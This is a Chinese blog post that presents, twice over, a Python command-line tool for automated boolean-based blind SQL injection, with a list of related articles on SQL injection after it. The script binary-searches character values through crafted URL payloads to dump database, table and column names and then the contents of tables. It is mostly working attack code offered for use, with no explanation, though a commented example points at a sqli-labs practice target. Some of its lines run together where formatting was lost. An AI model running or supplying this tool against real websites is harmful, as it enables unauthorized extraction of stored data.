sql注入半自动化扫描工具——盲注(分析后续补上)
2018-06-11 18:31
609 查看
代码展示墙:
import requests
import sys
import hashlib
from optparse import OptionParser
parser=OptionParser()parser.add_option("-D", "--Database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--Table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--Column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--Url", action="store",type="string",dest="url",help="Please input test url")(options,args) = parser.parse_args()def md5(str):
hl = hashlib.md5()
hl.update(str)
return hl.hexdigest()def http_get(url):
a=requests.get(url)
return a.contentdef getAllDatabases(url):
db_nums_payload = "select count(schema_name) from information_schema.schemata"
db_numbers=main(url,db_nums_payload)
db_name=""
for i in range(db_numbers):
db_len_payload="select length(schema_name) from information_schema.schemata limit %d,1" % i
db_name_numbers=main(url,db_len_payload)
for x in range(1,db_name_numbers+1):
db_lenc_payload="select ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))" % (i,x)
db_name+=chr(main(url,db_lenc_payload))
print("第%d个数据库的名称为:%s" % (i+1,db_name))
db_name=""
def main(url,payload):
low=0
high=126
a = md5(http_get(url))
while low <= high:
mid=(low+high)/2
# select count(schema_name) from information_schema.schemata;
cc=url + "' and (%s) > %d --+" % (payload,mid)
b=md5(http_get(cc))
if a==b:
low=mid+1
else:
q=mid-1
c=md5(http_get(url+"' and (%s) > %d --+" % (payload,q)))
if c==a:
return int(mid)
break
else:
high=mid-1
#getAllDatabases('http://192.168.3.104/sqli-labs/Less-8/?id=1')def select():
if options.url == None and options.database == None and options.table == None and options.column == None:
print("Please read the help")
parser.print_help()
sys.exit()
elif options.url != None and options.database ==None and options.table == None and options.column == None:
getAllDatabases(options.url)
elif options.url != None and options.database !=None and options.table == None and options.column == None:
getAllTables(options.url,options.database)
elif options.url != None and options.database !=None and options.table != None and options.column == None:
getAllColumnsByTable(options.url,options.table,options.database)
elif options.url != None and options.database !=None and options.table != None and options.column != None:
getAllContent(options.url,options.column,options.table,options.database)
def getAllTables(url,database):
tb_nums_payload = "select count(table_name) from information_schema.tables where table_schema='"+database+"'"
tb_numbers=main(url,tb_nums_payload)
tb_name=""
for i in range(tb_numbers):
tb_len_payload="select length(table_name) from information_schema.tables limit %d,1" % i
tb_name_numbers=main(url,tb_len_payload)
for x in range(1,tb_name_numbers+1):
tb_lenc_payload="select ascii(substr((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1))" % (database,i,x)
tb_name+=chr(main(url,tb_lenc_payload))
print("第%d个表的名称为:%s" % (i+1,tb_name))
tb_name=""def getAllColumnsByTable(url,table,database):
cl_nums_payload = "select count(column_name) from information_schema.columns where table_name='"+table+"'"
cl_numbers=main(url,cl_nums_payload)
cl_name=""
for i in range(cl_numbers):
cl_len_payload="select length(column_name) from information_schema.columns where table_name='%s' limit %d,1" % (table,i)
cl_name_numbers=main(url,cl_len_payload)
for x in range(1,cl_name_numbers+1):
cl_lenc_payload="select ascii(substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))" % (table,i,x)
cl_name+=chr(main(url,cl_lenc_payload))
print("第%d个列的名称为:%s" % (i+1,cl_name))
cl_name=""def getAllContent(url,column,table,database):
ct_nums_payload = "select count(%s) from %s.%s" % (column,database,table)
ct_numbers=main(url,ct_nums_payload)
ct_name=""
for i in range(ct_numbers):
ct_len_payload="select length(%s) from %s.%s limit %d,1" % (column,database,table,i)
ct_name_numbers=main(url,ct_len_payload)
for x in range(1,ct_name_numbers+1):
ct_lenc_payload="select ascii(substr((select %s from %s.%s limit %d,1),%d,1))" % (column,database,table,i,x)
ct_name+=chr(main(url,ct_lenc_payload))
print("第%d个字段的内容为:%s" % (i+1,ct_name))
ct_name=""
select() 阅读更多
先将代码保存在这里,解析以后会补上
# -*- coding: utf-8 -*-import requests
import sys
import hashlib
from optparse import OptionParser
parser=OptionParser()parser.add_option("-D", "--Database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--Table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--Column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--Url", action="store",type="string",dest="url",help="Please input test url")(options,args) = parser.parse_args()def md5(str):
hl = hashlib.md5()
hl.update(str)
return hl.hexdigest()def http_get(url):
a=requests.get(url)
return a.contentdef getAllDatabases(url):
db_nums_payload = "select count(schema_name) from information_schema.schemata"
db_numbers=main(url,db_nums_payload)
db_name=""
for i in range(db_numbers):
db_len_payload="select length(schema_name) from information_schema.schemata limit %d,1" % i
db_name_numbers=main(url,db_len_payload)
for x in range(1,db_name_numbers+1):
db_lenc_payload="select ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))" % (i,x)
db_name+=chr(main(url,db_lenc_payload))
print("第%d个数据库的名称为:%s" % (i+1,db_name))
db_name=""
def main(url,payload):
low=0
high=126
a = md5(http_get(url))
while low <= high:
mid=(low+high)/2
# select count(schema_name) from information_schema.schemata;
cc=url + "' and (%s) > %d --+" % (payload,mid)
b=md5(http_get(cc))
if a==b:
low=mid+1
else:
q=mid-1
c=md5(http_get(url+"' and (%s) > %d --+" % (payload,q)))
if c==a:
return int(mid)
break
else:
high=mid-1
#getAllDatabases('http://192.168.3.104/sqli-labs/Less-8/?id=1')def select():
if options.url == None and options.database == None and options.table == None and options.column == None:
print("Please read the help")
parser.print_help()
sys.exit()
elif options.url != None and options.database ==None and options.table == None and options.column == None:
getAllDatabases(options.url)
elif options.url != None and options.database !=None and options.table == None and options.column == None:
getAllTables(options.url,options.database)
elif options.url != None and options.database !=None and options.table != None and options.column == None:
getAllColumnsByTable(options.url,options.table,options.database)
elif options.url != None and options.database !=None and options.table != None and options.column != None:
getAllContent(options.url,options.column,options.table,options.database)
def getAllTables(url,database):
tb_nums_payload = "select count(table_name) from information_schema.tables where table_schema='"+database+"'"
tb_numbers=main(url,tb_nums_payload)
tb_name=""
for i in range(tb_numbers):
tb_len_payload="select length(table_name) from information_schema.tables limit %d,1" % i
tb_name_numbers=main(url,tb_len_payload)
for x in range(1,tb_name_numbers+1):
tb_lenc_payload="select ascii(substr((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1))" % (database,i,x)
tb_name+=chr(main(url,tb_lenc_payload))
print("第%d个表的名称为:%s" % (i+1,tb_name))
tb_name=""def getAllColumnsByTable(url,table,database):
cl_nums_payload = "select count(column_name) from information_schema.columns where table_name='"+table+"'"
cl_numbers=main(url,cl_nums_payload)
cl_name=""
for i in range(cl_numbers):
cl_len_payload="select length(column_name) from information_schema.columns where table_name='%s' limit %d,1" % (table,i)
cl_name_numbers=main(url,cl_len_payload)
for x in range(1,cl_name_numbers+1):
cl_lenc_payload="select ascii(substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))" % (table,i,x)
cl_name+=chr(main(url,cl_lenc_payload))
print("第%d个列的名称为:%s" % (i+1,cl_name))
cl_name=""def getAllContent(url,column,table,database):
ct_nums_payload = "select count(%s) from %s.%s" % (column,database,table)
ct_numbers=main(url,ct_nums_payload)
ct_name=""
for i in range(ct_numbers):
ct_len_payload="select length(%s) from %s.%s limit %d,1" % (column,database,table,i)
ct_name_numbers=main(url,ct_len_payload)
for x in range(1,ct_name_numbers+1):
ct_lenc_payload="select ascii(substr((select %s from %s.%s limit %d,1),%d,1))" % (column,database,table,i,x)
ct_name+=chr(main(url,ct_lenc_payload))
print("第%d个字段的内容为:%s" % (i+1,ct_name))
ct_name=""
select() 阅读更多
相关文章推荐
- sql注入半自动化扫描工具——报错注入(分析后续补上)
- sql盲注之报错注入(附自动化脚本)
- sql盲注之报错注入(附自动化脚本)
- SQLiScanner:又一款基于SQLMAP和Charles的被动SQL 注入漏洞扫描工具
- SQL注入自动扫描工具中的语句
- sql盲注之报错注入(附自动化脚本)
- SQL注入自动扫描工具中的语句
- Sql盲注与普通注入的区别
- Oracle PL/SQL 性能分析工具 profiler 说明
- 在Hdsi2.0 SQL的注入部分抓包分析语句
- C#最佳工具集合:IDE、分析、自动化工具等
- 分析SQL执行记录,发现SQL中的注入点
- C#最佳工具集合:IDE、分析、自动化工具等
- DB2 SQL应用调优——解释工具db2expln的使用及实例分析
- Red Gate系列之七 SQL Search 1.1.6.1 Edition SQL查询分析工具使用教程
- discuz 7.2 SQL 注入漏洞分析
- 10 个 SQL 注入工具
- 品味性能之道<五>:SQL分析工具
- [前端]前端测试自动化工具 + 页面性能分析工具 BerserkJS 试用小记
- Oracle PL/SQL 性能分析工具 profiler 说明